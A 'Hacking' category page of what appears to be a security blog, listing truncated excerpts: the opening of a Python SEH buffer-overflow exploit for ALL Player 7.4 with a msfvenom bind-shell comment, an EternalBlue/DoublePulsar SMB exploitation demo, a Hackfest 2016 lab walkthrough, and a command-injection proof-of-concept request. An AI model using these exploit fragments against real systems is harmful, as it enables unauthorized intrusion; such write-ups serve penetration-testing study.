Category: Hacking

#!/usr/bin/python # Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode) # Version: 7.4 # Date: 15-08-2017 # Exploit Author: f3ci # Tested on: Windows 7 SP1 x86 head = “http://” seh = “\x0f\x47” #0x0047000f nseh = “\x61\x41” #popad align junk = “\x41” * 301 junk2 = “\x41” * 45 #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e […]

EternalBlue dapat digunakan untuk melakukan eksploitasi pada layanan Server Message Block (SMB) tanpa membutuhkan proses otentikasi. Kemudian ditambah dengan menggunakan DoublePulsar untuk mengirim sekaligus mengeksekusi malicious Dynamic-Link Libraries (DLL) atau raw shellcode pada komputer korban. Berikut contoh percobaan eksploitasi pada layanan Server Message Block (SMB) menggunakan EternalBlue dan DoublePulsar. Percobaan ini dilakukan dengan membuat malicious […]

Iseng nge-lab lagi, fill the free time! Download here Hackfest 2016 Orcus Nmap Scanning the web with nikto OK first I’m interested with admin directory, let’s check it out! Hmm.. just like that, try to check backups directory I try to download this file “SimplePHPQuiz-Backupz.tar.gz” for find some information.. Yupp I found user and password […]

Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. https://www.owasp.org/index.php/Command_Injection Vulnerable Menu: Tools – Ping Proof of Concept: POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: 192.168.0.13:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, […]